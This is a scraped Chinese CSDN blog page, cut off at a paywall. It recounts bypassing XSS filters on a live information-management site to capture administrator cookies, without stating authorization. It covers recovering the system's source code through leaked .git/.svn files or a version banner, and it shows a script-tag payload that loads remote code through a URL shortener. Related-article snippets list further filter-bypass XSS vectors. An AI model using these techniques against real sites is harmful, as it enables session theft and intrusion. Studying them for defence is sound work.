xss防御方法base64_绕过某通用信息管理系统实现XSS

最新推荐文章于 2023-12-12 14:21:36 发布
最新推荐文章于 2023-12-12 14:21:36 发布
阅读量232 收藏
点赞数
文章标签: xss防御方法base64
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39644614/article/details/111672320
版权
本文介绍了在渗透测试中遇到的XSS防御及如何利用Base64编码和路径遍历技巧绕过限制。作者通过获取系统源码、分析过滤规则,结合Unicode和Hex编码,成功实现XSS攻击。强调在复杂环境中需结合多种思路以应对安全挑战。
摘要由CSDN通过智能技术生成

8e91bdfd061ca8ebfd4b889ffed0dc06.png

作者:青空酱 合天智汇

原创投稿活动:重金悬赏 | 合天原创投稿等你来

82955a2fec1999bf4c6f7665045e99e0.png

序言

实战渗透某站点时遇到的,经过几天研究最终成功绕过限制并打到管理员cookie,特此记录下备忘。将一些琐碎的trick和知识点进行了有机结合与综合实践,希望本文能对读者有所帮助,若有谬误,还请指正。

4ff61aa954676b5393d6775619cac0a1.png

准备工作

首先看看站点,事先测过了SQL等漏洞,这里只测试XSS。

7b2e3a416037962f9b169d2967750539.png

先尝试填充一些正常数据以判断是否会回显payload,经过测试,该站点提交信息会直接跳转回首页,无法查看payload解析执行情况。

注意:测试xss时往往不要一上来就怼<script>/:..等危险字符,有暴露渗透行为的风险且难以控制页面显示情况。

看不到回显难道就要盲打嘛?

这里提供一个思路:尝试获取该系统的源码并本地搭建进行测试。

好的,既然思路明确了,我们就尝试去获取该系统的源码。

  1. 扫描敏感目录及文件,查看是否存在.git / .svn等代码工程文件,如果存在的话,是 可以直接通过该敏感文件还原出系统源码的。

相关工具:https://github.com/lijiejie/GitHack

Seay-svn 还原工具,大家可以自行下载

  1. 从源码本身着手,寻找版权相关信息,之后去网上寻找并下载源码。

渗透该站时便使用了方法2,尝试访问后台时网页便爆出了我们想要的信息。

159985e9fa7de4c79a3279e35f8953f3.png

搜索相关源码并下载,成功在本地搭建。

280ab505cf3f5b9ef71dbc10cf9e6e86.png

好了,这样我们就可以放心测试xss了。(本地你想怎么怼都不会有风险的),关于XSS的学习,可以到合天网安实验室学习渗透XSS漏洞原理和利用,点击“实验:渗透XSS漏洞原理和利用(合天网安实验室)”可操作学习。

9c43931533c35dc061aa77ac4bfcfc60.png

e858d786eee901ace9277b1aecdd6f28.png

好戏开演

准备好payload:

<script src="http://x.co/qwq"></script>

这里推荐一个网站缩短服务:

http://x.co

访问设置url即可

最低0.47元/天 解锁文章
weixin_39644614
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xss防御方法base64_xss原理绕过防御个人总结
weixin_42511507的博客
01-17 294
xss原理xss产生的原因是将恶意的html脚本代码插入web页面,底层原理和sql注入一样,都是因为js和php等都是解释性语言,会将输入的当做命令执行,所以可以注入恶意代码执行我们想要的内容xss分类存储型xss:js脚本代码会插入数据库,具有一定的持久性反射型xss:js经过后端php等语言处理dom型xss:和反射型xss类似,但是不经过后端服务器的处理xss绕过总结:自身绕过alert(...
xss防御方法base64_XSS 跨站脚本攻击 的防御解决方案
weixin_34708196的博客
01-17 377
跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。这里我们分上下文来形成一个防御的解决方案,虽然说在某些特殊情况下依然可能会产生XSS,但是如果严格按照此解决方案则能避免大部分XSS攻击。原则:宁死也不让数据变成可执行的代码,不信任任何用户的数据,严格区分数据和代码。XSS ...
xss防御方法base64_跨站脚本(XSS漏洞实战演示——由易到难2
weixin_39846364的博客
12-22 390
前面几篇文章我们讲到了跨站脚本(XSS)漏洞的几种类型和验证方法以及防御措施,有兴趣的朋友可以到我的主页翻看文章《十大常见web漏洞——跨站脚本漏洞》和《实操web漏洞验证——跨站脚本漏洞》,今天我们继续由易到难实战演示一下跨站脚本漏洞的形成,以便更好地了解漏洞的产生原理,进一步做好防御。上一篇文章我们已经闯过了5关,今天我们继续。html事件中的xsshtml事件是在满足一定条件的用户行为发生时...
AntiXSS - 支持Html同时防止XSS攻击
weixin_33873846的博客
06-24 233
跨站脚本攻击(XSS)已经不是什么新鲜的话题了,甚至很多大公司也为此吃尽苦头。最简单直接的防范方法,就是不允许任何html标签输入,对用户输入进行编码(htmlencode)。但是如果想用户输入支持一些格式,怎么办?一种办法就是很多论坛采用的BB Code的方法。使用特定的标签代替一些格式。比如:[B]表示粗体,等等。但是,BB Code这种形式并不被广泛接受,它的表现力实在太差了,而且并不是标准...
XSS_Rays.zip_XSS Rays 下载_tool_xss扫描_xss扫描器_漏洞扫描
09-22
基于JS的XSS扫描器——XSS Rays. 最近The Spanner发布了一个名为XSS Rays的 XSS漏洞扫描器。这tool有点意思,是使用JS写的,JS遍历目标的link、form,然后构造测试用例去测试,可以发现DOM的XSS(当然是在测试用例打...
XSS.zip_XSS_c xss
09-24
防止XSS攻击有以下几种方法: 1. **输入验证与过滤**:对用户提交的数据进行严格的检查和清理,避免特殊字符的出现。 2. **输出编码**:在显示用户数据时,对可能包含恶意脚本的部分进行转义处理。 3. **HTTP头部...
XSS_Cheat_Sheet_2020_Edition:xss裂缝模糊测试payload的最佳集合2020版
03-19
绕过4.利用5.额外6.枚举内容1.HTML注入(代码注入)当输入的有效载荷,被插入到HTML标签或外部标签的属性值内时,则使用下面的方法进行测试,如果输入的内容被插入到了HTML注释,则在有效载荷之前添加“->” <svg...
自动绕过 XSS过滤器_Java_代码_相关文件_下载
07-12
绕过 XSS 过滤器 概述 snuck 是一个自动工具,其目标是通过基于反射上下文的专门注入来显着测试给定的 XSS 过滤器。这种方法采用 Selenium 来驱动 Web 浏览器来重现攻击者和受害者的行为。 更多详情、使用方法,...
XSS.rar_XSS_cross scripting_cross site java_cross site scripting
09-14
防止XSS攻击的方法主要包括: - **输入验证和转义**:对用户提交的数据进行严格的验证,避免特殊字符,并对输出的内容进行转义,确保不会执行任何JavaScript代码。 - **内容安全策略(Content Security Policy,CSP...
xss绕过
weixin_43271438的博客
09-29 1642
1. 利用html标签的属性值 利用场景:标签支持JavaScript:code伪协议 对应防御:过滤JavaScript关键字 &lt;iframe src=javascript:alert(1)&gt; &lt;a href=javascript:alert(1)&gt; 文本&lt;/a&gt; " &gt;&lt;svg x="" Onclick=alert(1)&gt; 注释: # ...
xss防御方法base64_原创干货 | XSS漏洞解析与挖掘
weixin_39681486的博客
12-15 526
漏洞简介跨站脚本攻击又名XSS,全称为Cross Site Scripting,为了区别层叠样式表(CSS)所以简称XSSXSS漏洞是指恶意攻击者向Web界面插入恶意的Script代码,当被攻击者访问该界面时触发恶意的Script代码,从而完成恶意攻击者的攻击。XSS漏洞是Web应用系统中出现频率最多的漏洞之一,图1为OWASP项目提出的”十大Web应用安全风险”,简称为OWASP T...
XSS漏洞
F2444790591的博客
06-22 810
攻击者在网页中嵌入客户端脚本,通常是JavaScript编写的恶意代码,当用户使用浏览器浏览被嵌入恶意代码的网页时,恶意代码将会在用户的浏览器上执行,将用户的信息发送给攻击者。 反射型XSS也被称为非持久性XSS,是现在最容易出现的一种 XSS 漏洞。当用户访问一个带有XSS代码的URL请求时,服务器端接收数据后处理,然后把带有XSS 代码的数据发送到浏览器,浏览器解析这段带有XSS 代码的数据后,最终造成XSS 漏洞。这个过程就像一次反射,故称为反射型XSS。 允许用户存储数据
XSS编码绕过防御
热门推荐
weixin_50464560的博客
05-07 1万+
第一部分:常用JS测试语句小结 1.0 常用测试语句说明 <script>alert(1)</script>        //这里alert(1)只是为了简单明了,当然可以弹出cookie.把1换成document.cookie即可.<script src=x οnerrοr=alert(1)></script>   //引入x,由于x不存在,触发onerror函数,进行弹框<script src='h
通过网址注入的XSS问题及引发的base64编码应用探讨
chuangxin的专栏
02-12 2360
url地址输入prompt等js代码就会引发xss问题,本文就url注入xss问题进行模拟、原理分析,建议使用base64编码、解码进行url携带js代码处理。
xss防御方法base64_前端常见代码漏洞之DOM型XSS漏洞(进阶高级前端必备知识点)...
weixin_39995943的博客
12-22 914
DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞漏洞等级:紧急风险分析:向Web 浏览器发送非法数据,从而导致浏览器执行恶意代码。客户端的脚本程序可以通过DOM来动态修改页面内容,从客户端获取DOM中的数据并在本地执...
XSS进阶一
giantbranch的专栏
09-04 3315
实验来源:合天网安实验室
XSS之编码
weixin_46611504的博客
03-24 2093
一:html编码 背景:html编码是用于输出html原本的标签的 比如我想在页面上输出div标签,但是如果我在html标签里直接写的话,就会被当成div标签执行,并不会输出在页面上,这个时候我想将他输出在页面上就需要用html编码 XSS中的应用:这种编码的形式可以用来去绕过一些过滤,比如,有些会过滤掉script ,alert,< >这样的危险的符号,这个时候,就可以用Html编码...
xss绕过方法有哪些?XSS攻击绕过过滤方法技巧分享(xss绕过宝塔)
最新发布
白帽子佳奇的博客
12-12 4614
XSS(跨站脚本攻击)绕过方法是一系列技巧,用来绕过目标网站的安全措施和过滤器,执行恶意的脚本。
Python实现Unicode绕过XSS防御:实战教程
本章节专注于第十六节“unicode绕过过滤触发XSS-01”在Web攻防训练营中的讲解,主要讨论的是如何利用Unicode字符编码在XSS(跨站脚本攻击)防御机制中实施巧妙的绕过策略。Unicode是一种广泛应用于计算机科学的标准...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值